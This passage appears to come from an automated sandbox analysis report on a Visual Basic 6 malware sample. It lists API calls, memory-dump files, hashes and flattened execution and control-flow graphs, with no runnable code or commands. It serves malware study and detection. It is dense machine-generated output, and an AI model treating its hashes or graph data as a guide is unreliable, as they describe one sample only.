                                                                                    • Opcode Fuzzy Hash: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                    • Instruction Fuzzy Hash: D9F0F637B4416052C364477DEA8559AB3D7AB8C783BC20177E248576738DB858C143AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042ABDE Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _adj_fdiv_m64.MSVBVM60(?,?), ref: 0042AC13
                                                                                    • __vbaExitProc.MSVBVM60(?,?), ref: 0042AC21
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042AC5E), ref: 0042AC53
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042AC5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Destruct$ExitProc_adj_fdiv_m64
                                                                                    • String ID:
                                                                                    • API String ID: 3272950176-0
                                                                                    • Opcode ID: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                    • Instruction ID: 432503350bff8fd263bfd7ee333f73b5f20f6540c55ce1ae75e3df8e8a0f3385
                                                                                    • Opcode Fuzzy Hash: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                    • Instruction Fuzzy Hash: 74F01730E48128EBDB209B51ED44BE8BB38BB54301F9080EAE58471094CBB95EE19F5A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:26.6%
                                                                                    Dynamic/Decrypted Code Coverage:1.1%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:454
                                                                                    Total number of Limit Nodes:50
                                                                                    execution_graph 1037 418974 __vbaChkstk 1038 4189c5 __vbaOnError 1037->1038 1039 4189d5 __vbaNew2 1038->1039 1040 4189ed 1038->1040 1039->1040 1041 418a16 __vbaHresultCheckObj 1040->1041 1042 418a2d 1040->1042 1041->1042 1043 418a51 __vbaHresultCheckObj 1042->1043 1044 418a68 1042->1044 1045 418a6c __vbaFreeObj 1043->1045 1044->1045 1046 418a84 __vbaEnd 1045->1046 1047 418a89 1045->1047 1046->1047 1048 418a92 __vbaNew2 1047->1048 1049 418aaa 1047->1049 1048->1049 1050 418ad3 __vbaHresultCheckObj 1049->1050 1051 418aea 1049->1051 1050->1051 1052 418b23 1051->1052 1053 418b0c __vbaHresultCheckObj 1051->1053 1054 418b27 __vbaFreeObj 1052->1054 1053->1054 1068 41aafb __vbaChkstk __vbaOnError __vbaStrCopy 1054->1068 1056 418b3f __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 1057 418b76 1056->1057 1058 418b81 __vbaHresultCheckObj 1057->1058 1059 418b9b __vbaObjSet 1057->1059 1058->1059 1061 418bc7 1059->1061 1062 418bd2 __vbaHresultCheckObj 1061->1062 1063 418be9 1061->1063 1064 418bed __vbaFreeObj 1062->1064 1063->1064 1082 41dceb __vbaChkstk __vbaOnError 1064->1082 1067 418c2b 1069 41ab70 __vbaNew2 1068->1069 1070 41ab88 1068->1070 1069->1070 1071 41abb1 __vbaHresultCheckObj 1070->1071 1072 41abc8 1070->1072 1071->1072 1073 41abdd __vbaSetSystemError 1072->1073 1074 41acb2 __vbaFreeStr 1073->1074 1075 41abfb #525 __vbaStrMove __vbaStrToAnsi 1073->1075 1074->1056 1106 416ea4 1075->1106 1083 41aafb 20 API calls 1082->1083 1084 41dd53 8 API calls 1083->1084 1085 41de93 __vbaStrCopy 1084->1085 1086 41dddf __vbaStrCopy 1084->1086 1087 41acf6 12 API calls 1085->1087 1155 41acf6 __vbaChkstk __vbaLenBstr 1086->1155 1089 41deb0 __vbaStrMove __vbaStrCopy __vbaStrMove 1087->1089 1091 41aafb 20 API calls 1089->1091 1093 41def2 __vbaStrMove 1091->1093 1092 41aafb 20 API calls 1094 41de38 __vbaStrMove 1092->1094 1095 41ae58 21 API calls 1093->1095 1160 41ae58 __vbaChkstk __vbaLenBstr 1094->1160 1097 41df0a __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1095->1097 1099 41df48 1097->1099 1098 41de50 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1098->1099 1100 41df73 __vbaObjSet 1099->1100 1101 41df58 __vbaNew2 1099->1101 1108 41e01c __vbaChkstk __vbaOnError __vbaObjSetAddref 1100->1108 1101->1100 1104 41dfa9 __vbaFreeObj 1105 418bfe __vbaFreeVar __vbaExitProc 1104->1105 1105->1067 1107 416ead 1106->1107 1109 41e088 1108->1109 1110 41e099 __vbaHresultCheckObj 1109->1110 1111 41e0bc 1109->1111 1112 41e0c3 __vbaI2I4 1110->1112 1111->1112 1113 41e0df 1112->1113 1114 41e0f0 __vbaHresultCheckObj 1113->1114 1115 41e113 1113->1115 1114->1115 1116 41e141 __vbaHresultCheckObj 1115->1116 1117 41e164 1115->1117 1116->1117 1118 41e192 __vbaHresultCheckObj 1117->1118 1119 41e1b5 1117->1119 1120 41e1bc __vbaI2I4 1118->1120 1119->1120 1121 41e1d9 1120->1121 1122 41e1ea __vbaHresultCheckObj 1121->1122 1123 41e20d 1121->1123 1122->1123 1124 41e240 __vbaHresultCheckObj 1123->1124 1125 41e263 1123->1125 1124->1125 1126 41e280 __vbaFpI4 1125->1126 1127 41e6e5 1125->1127 1128 41e2ad 1126->1128 1129 41e6ea __vbaErrorOverflow 1127->1129 1130 41e669 __vbaObjSetAddref 1128->1130 1133 41e2e8 __vbaHresultCheckObj 1128->1133 1134 41e30b 1128->1134 1167 41b886 8 API calls 1130->1167 1132 41e689 __vbaFreeVar __vbaExitProc 1135 41e6bd __vbaFreeObj __vbaAryDestruct 1132->1135 1133->1134 1134->1127 1136 41e328 __vbaFpI4 1134->1136 1135->1104 1138 41e355 1136->1138 1137 41e65a 1137->1130 1138->1137 1139 41e3d3 __vbaHresultCheckObj 1138->1139 1140 41e3f6 1138->1140 1139->1140 1140->1127 1141 41e434 __vbaFpI4 1140->1141 1142 41e4e6 __vbaUbound 1141->1142 1143 41e446 1141->1143 1142->1137 1144 41e4f9 1142->1144 1145 41e498 __vbaHresultCheckObj 1143->1145 1146 41e4bb 1143->1146 1148 41e582 1144->1148 1149 41e55f __vbaHresultCheckObj 1144->1149 1147 41e4c2 __vbaRedimPreserve 1145->1147 1146->1147 1147->1137 1150 41e589 __vbaPowerR8 1148->1150 1149->1150 1151 41e5b6 1150->1151 1152 41e5be _adj_fdivr_m64 1150->1152 1151->1127 1153 41e5d9 6 API calls 1151->1153 1152->1151 1153->1129 1154 41e631 __vbaDerefAry1 __vbaFreeStr __vbaFreeVarList 1153->1154 1154->1137 1156 41ad47 1155->1156 1157 41ae06 __vbaStrMove __vbaStrCopy __vbaStrMove 1156->1157 1158 41ad68 9 API calls 1156->1158 1159 41ae53 __vbaErrorOverflow 1156->1159 1157->1092 1158->1156 1161 41aeb2 1160->1161 1162 41afb7 __vbaStrCopy 1161->1162 1163 41aebe 6 API calls 1161->1163 1166 41aff6 __vbaFreeStr 1162->1166 1164 41b013 __vbaErrorOverflow 1163->1164 1165 41af2e 10 API calls 1163->1165 1165->1162 1166->1098 1358 416d94 1167->1358 1169 41b92b __vbaSetSystemError 1170 41b940 #644 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock 1169->1170 1171 41b93b 6 API calls 1169->1171 1172 416d94 1170->1172 1171->1132 1173 41b9a2 __vbaSetSystemError 1172->1173 1173->1171 1175 41b9b8 1173->1175 1175->1171 1176 41b7b8 7 API calls 1175->1176 1177 41b9d0 __vbaAryMove __vbaStrCopy 1176->1177 1178 41acf6 12 API calls 1177->1178 1179 41ba05 __vbaStrMove __vbaStrCopy __vbaStrMove 1178->1179 1180 41ae58 21 API calls 1179->1180 1181 41ba59 31 API calls 1180->1181 1182 41b018 32 API calls 1181->1182 1183 41bcda __vbaErase __vbaFreeStrList 1182->1183 1183->1171 1184 41bd47 __vbaStrCopy 1183->1184 1185 41acf6 12 API calls 1184->1185 1186 41bd6d __vbaStrMove __vbaStrCopy __vbaStrMove 1185->1186 1187 41ae58 21 API calls 1186->1187 1188 41bdc1 8 API calls 1187->1188 1189 41b018 32 API calls 1188->1189 1190 41be87 __vbaErase __vbaFreeStrList 1189->1190 1191 41bee2 __vbaStrCopy 1190->1191 1192 41c054 #644 1190->1192 1195 41acf6 12 API calls 1191->1195 1193 41c082 __vbaGenerateBoundsError 1192->1193 1194 41c079 1192->1194 1196 41c08d #644 1193->1196 1194->1196 1197 41befe __vbaStrMove __vbaStrCopy __vbaStrMove 1195->1197 1198 416d94 1196->1198 1199 41ae58 21 API calls 1197->1199 1200 41c0b9 __vbaSetSystemError 1198->1200 1201 41bf52 7 API calls 1199->1201 1203 41c0da __vbaStrCopy 1200->1203 1204 41c0ce 1200->1204 1202 41b018 32 API calls 1201->1202 1205 41c00d __vbaErase __vbaFreeStrList 1202->1205 1206 41acf6 12 API calls 1203->1206 1204->1203 1205->1171 1207 41c0f6 __vbaStrMove __vbaStrCopy __vbaStrMove 1206->1207 1208 41ae58 21 API calls 1207->1208 1209 41c14a 13 API calls 1208->1209 1210 41b018 32 API calls 1209->1210 1211 41c29c __vbaErase __vbaFreeStrList 1210->1211 1212 41c2f7 __vbaStrCopy 1211->1212 1221 41c469 1211->1221 1213 41acf6 12 API calls 1212->1213 1215 41c313 __vbaStrMove __vbaStrCopy __vbaStrMove 1213->1215 1214 41c500 __vbaStrCopy 1217 41acf6 12 API calls 1214->1217 1220 41ae58 21 API calls 1215->1220 1216 41dce6 __vbaErrorOverflow 1219 41dceb __vbaChkstk __vbaOnError 1216->1219 1218 41c51c __vbaStrMove __vbaStrCopy __vbaStrMove 1217->1218 1222 41ae58 21 API calls 1218->1222 1223 41aafb 20 API calls 1219->1223 1224 41c367 7 API calls 1220->1224 1221->1214 1221->1216 1225 41c499 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock #644 1221->1225 1226 41c570 11 API calls 1222->1226 1227 41dd53 8 API calls 1223->1227 1228 41b018 32 API calls 1224->1228 1229 416d94 1225->1229 1230 41b018 32 API calls 1226->1230 1231 41de93 __vbaStrCopy 1227->1231 1232 41dddf __vbaStrCopy 1227->1232 1233 41c422 __vbaErase __vbaFreeStrList 1228->1233 1234 41c4fb __vbaSetSystemError 1229->1234 1236 41c68e __vbaErase __vbaFreeStrList 1230->1236 1235 41acf6 12 API calls 1231->1235 1237 41acf6 12 API calls 1232->1237 1233->1171 1234->1214 1238 41deb0 __vbaStrMove __vbaStrCopy __vbaStrMove 1235->1238 1239 41c861 __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock 1236->1239 1240 41c6ef __vbaStrCopy 1236->1240 1241 41ddfc __vbaStrMove __vbaStrCopy __vbaStrMove 1237->1241 1242 41aafb 20 API calls 1238->1242 1245 416d94 1239->1245 1243 41acf6 12 API calls 1240->1243 1244 41aafb 20 API calls 1241->1244 1246 41def2 __vbaStrMove 1242->1246 1247 41c70b __vbaStrMove __vbaStrCopy __vbaStrMove 1243->1247 1248 41de38 __vbaStrMove 1244->1248 1249 41c8ae __vbaSetSystemError 1245->1249 1250 41ae58 21 API calls 1246->1250 1251 41ae58 21 API calls 1247->1251 1252 41ae58 21 API calls 1248->1252 1249->1216 1253 41c8c4 1249->1253 1254 41df0a __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1250->1254 1255 41c75f 7 API calls 1251->1255 1256 41de50 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1252->1256 1257 41c901 #644 __vbaAryLock 1253->1257 1344 41ca2b 1253->1344 1258 41df48 1254->1258 1259 41b018 32 API calls 1255->1259 1256->1258 1257->1216 1260 41c935 1257->1260 1262 41df73 __vbaObjSet 1258->1262 1263 41df58 __vbaNew2 1258->1263 1261 41c81a __vbaErase __vbaFreeStrList 1259->1261 1260->1216 1266 41c94e __vbaDerefAry1 #644 __vbaAryUnlock 1260->1266 1261->1171 1271 41e01c 174 API calls 1262->1271 1263->1262 1264 41cd2e __vbaStrCopy 1265 41acf6 12 API calls 1264->1265 1267 41cd4a __vbaStrMove __vbaStrCopy __vbaStrMove 1265->1267 1268 416d94 1266->1268 1270 41ae58 21 API calls 1267->1270 1274 41c985 __vbaSetSystemError 1268->1274 1272 41cd9e 13 API calls 1270->1272 1275 41dfa9 __vbaFreeObj 1271->1275 1276 41b018 32 API calls 1272->1276 1273 41ca7a #644 1273->1344 1277 41b664 45 API calls 1274->1277 1278 41dffd 1275->1278 1279 41ceec __vbaErase __vbaFreeStrList 1276->1279 1281 41c9ae __vbaStrMove 1277->1281 1278->1132 1282 41cf58 __vbaStrCopy 1279->1282 1283 41d0ca __vbaStrCopy 1279->1283 1280 41ca9f __vbaSetSystemError 1280->1216 1280->1344 1281->1216 1284 41c9ca __vbaAryLock __vbaDerefAry1 #644 __vbaAryUnlock 1281->1284 1285 41acf6 12 API calls 1282->1285 1287 41acf6 12 API calls 1283->1287 1286 416d94 1284->1286 1288 41cf74 __vbaStrMove __vbaStrCopy __vbaStrMove 1285->1288 1289 41ca21 __vbaSetSystemError 1286->1289 1290 41d0e6 __vbaStrMove __vbaStrCopy __vbaStrMove 1287->1290 1291 41ae58 21 API calls 1288->1291 1289->1344 1292 41ae58 21 API calls 1290->1292 1293 41cfc8 7 API calls 1291->1293 1295 41d13a 9 API calls 1292->1295 1296 41b018 32 API calls 1293->1296 1294 41cb08 _adj_fdiv_m64 1294->1344 1297 41b018 32 API calls 1295->1297 1299 41d083 __vbaErase __vbaFreeStrList 1296->1299 1298 41d22d __vbaErase __vbaFreeStrList 1297->1298 1298->1216 1302 41d27e __vbaStrCopy 1298->1302 1299->1171 1300 41dce1 1300->1216 1301 41cb23 __vbaFpI4 1301->1216 1303 41cb40 #644 1301->1303 1304 41acf6 12 API calls 1302->1304 1305 416d94 1303->1305 1306 41d29d __vbaStrMove __vbaStrCopy __vbaStrMove 1304->1306 1307 41cb62 __vbaSetSystemError 1305->1307 1309 41ae58 21 API calls 1306->1309 1307->1216 1308 41cb78 __vbaI2I4 1307->1308 1308->1344 1310 41d2f1 14 API calls 1309->1310 1311 41b018 32 API calls 1310->1311 1313 41d440 __vbaErase __vbaFreeStrList 1311->1313 1312 41cbee _adj_fdiv_m64 1312->1344 1314 41d4ac __vbaStrCopy 1313->1314 1315 41d61e 1313->1315 1318 41acf6 12 API calls 1314->1318 1315->1216 1316 41d62d __vbaStrCopy 1315->1316 1319 41acf6 12 API calls 1316->1319 1317 41cc09 __vbaFpI4 __vbaI2I4 1317->1344 1320 41d4c8 __vbaStrMove __vbaStrCopy __vbaStrMove 1318->1320 1321 41d65b __vbaStrMove __vbaStrCopy __vbaStrMove 1319->1321 1322 41ae58 21 API calls 1320->1322 1323 41ae58 21 API calls 1321->1323 1324 41d51c 7 API calls 1322->1324 1325 41d6af 8 API calls 1323->1325 1326 41b018 32 API calls 1324->1326 1327 41b018 32 API calls 1325->1327 1328 41d5d7 __vbaErase __vbaFreeStrList 1326->1328 1329 41d775 __vbaErase __vbaFreeStrList 1327->1329 1328->1171 1331 41d7d0 __vbaStrCopy 1329->1331 1332 41d942 __vbaStrCopy 1329->1332 1330 41cc7c #644 1330->1344 1335 41acf6 12 API calls 1331->1335 1336 41acf6 12 API calls 1332->1336 1333 41ccfd #644 1333->1344 1334 41cca1 __vbaSetSystemError 1334->1216 1334->1344 1338 41d7ec __vbaStrMove __vbaStrCopy __vbaStrMove 1335->1338 1337 41d95e __vbaStrMove __vbaStrCopy __vbaStrMove 1336->1337 1340 41ae58 21 API calls 1337->1340 1342 41ae58 21 API calls 1338->1342 1339 41cd1f __vbaSetSystemError 1339->1344 1343 41d9b2 __vbaStrMove __vbaRedim __vbaDerefAry1 __vbaVarZero __vbaStrMove 1340->1343 1341 41ccc1 #644 1341->1344 1345 41d840 7 API calls 1342->1345 1346 41b018 32 API calls 1343->1346 1344->1216 1344->1264 1344->1273 1344->1280 1344->1294 1344->1300 1344->1301 1344->1312 1344->1317 1344->1330 1344->1333 1344->1334 1344->1339 1344->1341 1347 41ccec __vbaSetSystemError 1344->1347 1348 41b018 32 API calls 1345->1348 1349 41da40 __vbaErase __vbaFreeStrList 1346->1349 1347->1344 1350 41d8fb __vbaErase __vbaFreeStrList 1348->1350 1349->1171 1351 41daa1 __vbaStrCopy 1349->1351 1350->1171 1352 41acf6 12 API calls 1351->1352 1353 41dabd __vbaStrMove __vbaStrCopy __vbaStrMove 1352->1353 1354 41ae58 21 API calls 1353->1354 1355 41db11 7 API calls 1354->1355 1356 41b018 32 API calls 1355->1356 1357 41dbcc __vbaErase __vbaFreeStrList 1356->1357 1357->1171 1359 416d9d 1358->1359 1360 419436 __vbaChkstk 1361 419487 __vbaOnError 1360->1361 1362 4194ad __vbaStrCopy 1361->1362 1363 41951f 1361->1363 1407 418c4b __vbaChkstk 1362->1407 1364 41997d __vbaErrorOverflow __vbaChkstk 1363->1364 1369 41954d __vbaStrCopy 1363->1369 1370 4195bf 1363->1370 1368 4199d3 __vbaOnError 1364->1368 1365 4194d7 1366 4194e0 __vbaHresultCheckObj 1365->1366 1367 4194fa 1365->1367 1371 4194fe __vbaFreeStr __vbaFreeVar 1366->1371 1367->1371 1372 4199fa 1368->1372 1403 418c4b 94 API calls 1369->1403 1370->1364 1374 4195ed __vbaStrCopy 1370->1374 1375 41965f 1370->1375 1371->1363 1373 419577 1376 419580 __vbaHresultCheckObj 1373->1376 1377 41959a 1373->1377 1406 418c4b 94 API calls 1374->1406 1375->1364 1382 41968d __vbaStrCopy 1375->1382 1383 4196ff 1375->1383 1378 41959e __vbaFreeStr __vbaFreeVar 1376->1378 1377->1378 1378->1370 1379 419617 1380 419620 __vbaHresultCheckObj 1379->1380 1381 41963a 1379->1381 1384 41963e __vbaFreeStr __vbaFreeVar 1380->1384 1381->1384 1405 418c4b 94 API calls 1382->1405 1383->1364 1385 419716 1383->1385 1384->1375 1389 419930 1385->1389 1390 419732 6 API calls 1385->1390 1386 4196b7 1387 4196c0 __vbaHresultCheckObj 1386->1387 1388 4196da 1386->1388 1391 4196de __vbaFreeStr __vbaFreeVar 1387->1391 1388->1391 1392 419831 6 API calls 1390->1392 1393 41979b __vbaStrCat __vbaStrMove __vbaStrCopy __vbaStrCopy 1390->1393 1391->1385 1392->1389 1394 41989a __vbaStrCat __vbaStrMove __vbaStrCopy __vbaStrCopy 1392->1394 1395 4197f4 1393->1395 1396 4198f3 1394->1396 1397 419817 1395->1397 1398 4197fd __vbaHresultCheckObj 1395->1398 1399 419916 1396->1399 1400 4198fc __vbaHresultCheckObj 1396->1400 1401 41981b __vbaFreeStrList 1397->1401 1398->1401 1402 41991a __vbaFreeStrList 1399->1402 1400->1402 1401->1392 1402->1389 1403->1373 1405->1386 1406->1379 1408 418c94 __vbaOnError 1407->1408 1409 418cd5 1408->1409 1410 418cbc __vbaNew2 1408->1410 1411 41aafb 20 API calls 1409->1411 1410->1409 1412 418d06 __vbaStrMove 1411->1412 1413 418d22 1412->1413 1414 418d53 1413->1414 1415 418d33 __vbaHresultCheckObj 1413->1415 1416 418d5a __vbaCastObj __vbaObjSet __vbaFreeStr __vbaFreeObj 1414->1416 1415->1416 1417 418da3 1416->1417 1418 418dd1 1417->1418 1419 418db4 __vbaHresultCheckObj 1417->1419 1420 418dd8 __vbaObjSet __vbaForEachCollObj 1418->1420 1419->1420 1426 418e18 1420->1426 1421 41931a 6 API calls 1422 4193d1 __vbaFreeObjList __vbaFreeObj __vbaAryDestruct __vbaFreeObj __vbaFreeObj 1421->1422 1422->1365 1423 418e3f __vbaHresultCheckObj 1423->1426 1424 418e83 __vbaHresultCheckObj 1425 418ea7 __vbaInStr __vbaInStr __vbaFreeStrList 1424->1425 1425->1426 1426->1421 1426->1423 1426->1424 1426->1425 1427 41917e __vbaHresultCheckObj 1426->1427 1428 418f2e __vbaHresultCheckObj 1426->1428 1429 41aafb 20 API calls 1426->1429 1430 41aafb 20 API calls 1426->1430 1427->1426 1428->1426 1431 4191b8 __vbaStrMove 1429->1431 1432 418f5e __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 1430->1432 1439 4191d1 1431->1439 1450 41b3e6 __vbaChkstk __vbaOnError 1432->1450 1434 418f99 __vbaStrMove 1436 418fb2 1434->1436 1435 4191e2 __vbaHresultCheckObj 1437 419206 7 API calls 1435->1437 1438 418fc3 __vbaHresultCheckObj 1436->1438 1441 41aafb 20 API calls 1436->1441 1437->1439 1438->1436 1439->1435 1439->1437 1440 41929e __vbaHresultCheckObj 1439->1440 1442 4192c5 __vbaFreeStrList 1439->1442 1440->1442 1443 418ffd __vbaStrMove 1441->1443 1444 4192eb __vbaNextEachCollObj 1442->1444 1447 419016 1443->1447 1444->1426 1445 419027 __vbaHresultCheckObj 1446 41904b 7 API calls 1445->1446 1446->1447 1447->1445 1447->1446 1448 4190f1 __vbaHresultCheckObj 1447->1448 1449 419118 __vbaFreeStrList 1447->1449 1448->1449 1449->1444 1451 41b444 __vbaNew2 1450->1451 1452 41b45a 1450->1452 1451->1452 1453 41b4a4 1452->1453 1454 41b48d __vbaHresultCheckObj 1452->1454 1455 41b4a8 __vbaCastObj __vbaObjSet __vbaFreeObj 1453->1455 1454->1455 1457 41b4c7 1455->1457 1456 41b4e8 __vbaHresultCheckObj 1456->1457 1457->1456 1458 41b561 __vbaCastObj __vbaObjSet 1457->1458 1460 41b52c __vbaHresultCheckObj 1457->1460 1461 41b547 __vbaStrMove 1457->1461 1459 41b5a8 __vbaFreeObj __vbaFreeObj 1458->1459 1459->1434 1460->1461 1461->1457 1471 419a9a __vbaChkstk 1472 419ae3 __vbaOnError __vbaStrCopy 1471->1472 1473 41acf6 12 API calls 1472->1473 1474 419b00 __vbaStrMove __vbaStrCopy __vbaStrMove 1473->1474 1475 41ae58 21 API calls 1474->1475 1476 419b3f __vbaStrMove __vbaFreeStrList __vbaStrCopy 1475->1476 1477 41acf6 12 API calls 1476->1477 1478 419b79 __vbaStrMove __vbaStrCopy __vbaStrMove 1477->1478 1479 41ae58 21 API calls 1478->1479 1480 419bb8 __vbaStrMove __vbaFreeStrList __vbaStrCmp 1479->1480 1481 419bf3 14 API calls 1480->1481 1482 419e08 #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1480->1482 1485 419dc7 1481->1485 1483 419e64 22 API calls 1482->1483 1494 41a0a6 __vbaExitProc 1482->1494 1486 41a022 1483->1486 1488 419dd6 __vbaHresultCheckObj 1485->1488 1489 419df6 1485->1489 1490 41a051 1486->1490 1491 41a031 __vbaHresultCheckObj 1486->1491 1487 41a12a 7 API calls 1488->1489 1489->1482 1492 41a058 __vbaStrCmp __vbaFreeStr 1490->1492 1491->1492 1493 41a087 #529 1492->1493 1492->1494 1493->1494 1494->1487 1462 4019ac #100 1463 4019e4 1462->1463 1464 41a18c __vbaChkstk 1465 41a1d5 29 API calls 1464->1465 1466 41a386 __vbaExitProc 1465->1466 1467 41a3bd __vbaFreeStr __vbaFreeObj __vbaFreeStr 1466->1467 1495 40123d 1496 401318 1495->1496 1496->1496 1497 40137e __vbaExceptHandler 1496->1497 1498 41a3ff __vbaChkstk 1499 41a448 __vbaOnError #648 __vbaFreeVar __vbaFileOpen #570 1498->1499 1500 41a54f 8 API calls 1499->1500 1501 41a4bf #570 1499->1501 1503 41aa1b __vbaErrorOverflow __vbaChkstk 1500->1503 1504 41a5e3 39 API calls 1500->1504 1502 41a4d9 6 API calls 1501->1502 1501->1503 1502->1500 1505 41aa60 #717 __vbaVar2Vec __vbaAryMove __vbaFreeVar 1503->1505 1506 41a881 1504->1506 1507 41aad3 1505->1507 1508 41a8b0 1506->1508 1509 41a890 __vbaHresultCheckObj 1506->1509 1510 41a8b7 __vbaChkstk __vbaObjVar __vbaLateMemCall __vbaFreeVar 1508->1510 1509->1510 1511 41a955 __vbaFreeVar __vbaAryDestruct __vbaAryDestruct __vbaFreeStr 1510->1511 1512 41a91d __vbaVarLateMemCallLd __vbaStrVarMove __vbaStrMove __vbaFreeVar 1510->1512 1512->1511 1468 419a0e __vbaChkstk 1469 419a5f __vbaOnError 1468->1469 1470 419a86 1469->1470

                                                                                    Callgraph

                                                                                    Executed Functions

                                                                                    Function 004019AC Relevance: 13.3, APIs: 1, Strings: 5, Instructions: 2829COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 548 4019ac-4019e2 #100 549 4019e4-4019e9 548->549 550 401a4d-401a59 548->550 551 401a5a-401a64 549->551 552 4019eb-4019f6 549->552 550->551 553 401a65-401a6c 551->553 552->553 554 4019f8-401a19 552->554 555 401adb-4022c4 553->555 556 401a6e-401a77 553->556 554->550 558 4022c7-402305 555->558 559 40232c-402330 555->559 556->555 579 402327-40232a 558->579 580 402307-402324 558->580 560 402333-40239d 559->560 561 40239f-402559 559->561 560->561 577 40255b-402571 561->577 578 4025bc-4025be 561->578 581 402573-40259b 577->581 582 4025df-4025e8 577->582 584 40263a 578->584 585 4025bf 578->585 579->559 579->561 580->579 581->585 586 40259d-4025a5 581->586 591 40265a-40265d 582->591 592 4025ea-402600 582->592 588 4026a6-4026cb 584->588 589 40263d 584->589 585->584 590 4025c1-4025ce 585->590 595 4025a7 586->595 596 40261a-40261d 586->596 601 4026cd 588->601 598 40264c 589->598 599 40263f 589->599 590->599 600 4025d0-4025dd 590->600 593 40267f-402683 591->593 594 40265f 591->594 602 402602-402605 592->602 603 402677-40267c 592->603 610 402686-40268d 593->610 604 402661 594->604 605 4026cf-4026e5 594->605 608 4025aa-4025b9 595->608 609 40260f 595->609 606 40268e-40268f 596->606 607 40261f 596->607 613 40264f-402658 598->613 611 402662 599->611 612 402642-402649 599->612 600->582 601->605 614 402627-40262b 602->614 615 402607-40260b 602->615 603->593 604->611 630 4026e6-402709 605->630 606->601 621 402691-402694 606->621 617 402621-402624 607->617 618 402695 607->618 608->578 609->610 616 402611-402615 609->616 610->606 611->610 619 402664-40266f 611->619 612->598 613->591 614->613 620 40262d-402635 614->620 615->609 616->596 617->614 627 40270a-402a99 618->627 628 402697-40269e 618->628 625 402673-402675 619->625 620->625 626 402637 620->626 621->618 621->627 625->603 625->630 626->584 654 402a9b-402aab 627->654 628->588 630->627 654->654 655 402aad-402ac3 654->655 657 402ac5-402acf 655->657 659 402ad1-402ad6 657->659 660 402b3e-402ca1 657->660 661 402ad8-402adc 659->661 662 402b3d 659->662 665 402ca4-402ca5 660->665 666 402d09-402d0d 660->666 669 402b31-402b3c 661->669 670 402ade-402b0a 661->670 662->660 667 402d17 665->667 668 402ca8 665->668 671 402d0f-402d14 666->671 674 402d18-402d19 667->674 668->671 672 402caa-402cad 668->672 669->662 685 402b0b-402b22 670->685 671->667 676 402cb0-402cb1 672->676 677 402d24 672->677 674->676 679 402d1a-402d1b 674->679 676->674 680 402cb3-402cbf 676->680 682 402d26-402e6a 677->682 680->682 683 402cc1-402d06 680->683 700 402e6c-402ecc 682->700 701 402ecd-402f26 682->701 683->666 685->685 687 402b24-402b27 685->687 687->657 689 402b29-402b2f 687->689 689->669 700->701
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: #100
                                                                                    • String ID: 5a76$:nrh$mx?v$slaf$y
                                                                                    • API String ID: 1341478452-4087117608
                                                                                    • Opcode ID: ae504434ee61f0298d7d8caa9a33c12ae6aa5365d1fb4d208dedf297d2375590
                                                                                    • Instruction ID: 2d39639171d1d14927f0903683d83c7a2e95202c90fa839e62e4466a7afb7263
                                                                                    • Opcode Fuzzy Hash: ae504434ee61f0298d7d8caa9a33c12ae6aa5365d1fb4d208dedf297d2375590
                                                                                    • Instruction Fuzzy Hash: 1782546244E7C11FCB138B704E7A5917FB06E2321471E86EFC4C19E4E3D2AD994AC76A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B886 Relevance: 655.0, APIs: 345, Strings: 28, Instructions: 2227COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
